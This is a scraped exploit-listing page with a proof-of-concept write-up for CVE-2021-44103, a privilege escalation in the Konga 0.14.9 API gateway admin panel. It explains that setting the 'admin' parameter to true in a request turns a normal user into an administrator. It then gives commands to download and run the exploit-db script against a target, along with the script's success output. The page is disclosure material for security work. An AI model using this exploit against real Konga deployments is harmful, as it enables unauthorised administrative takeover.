Exploit for CVE-2021-44103 exploit

Share

## https://sploitus.com/exploit?id=A00E4CA2-764A-5006-9E88-00CDF5E0C3A9 # CVE-2021-44103 A proof of concept for KONGA 0.14.9 - Privilege Escalation. ## Intro On November 16, 2021, Fabrício Salomão and I found a vulnerability in Konga API Gateways, allowing any authenticated user to become an administrator. ## Report Vulnerability Product: KONGA<br/> Model: 0.14.9<br/> Vulnerability: Privilege Escalation<br/> Impact: Full admin access (vertical privilege escalation)<br/> Authentication: required<br/> Exploit Author: [Fabricio Salomao](https://twitter.com/_SOl0m0n) / [Paulo Trindade](https://twitter.com/paulotrindadec) ## PoC Bellow has created a normal user called "usernormal" without privilege.   Through of request bellow was changed the flag "FALSE" in the parameter "admin" to "TRUE".  Therefore was created an exploit for us : https://www.exploit-db.com/exploits/50521  After running the exploit, the privilege escalation was a success! Result:  ## Running the exploit ``` wget https://www.exploit-db.com/raw/50521 -O 50521.py Edit 50521.py Modify: urlkonga = "http://www.example.com:1337/" # change to your konga address identifier = "usernormalkonga" # change user password = "changeme" # change password Execute: python 50521.py [+] Attack [+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U [+] Change Normal User to Admin [+] Success ``` ## LINKS http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html https://www.exploit-db.com/exploits/50521 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103 https://github.com/advisories/GHSA-f2mp-8fgg-7465 https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821 https://twitter.com/CVEnew/status/1508455166885961732 https://twitter.com/search?q=CVE-2021-44103&src=typed_query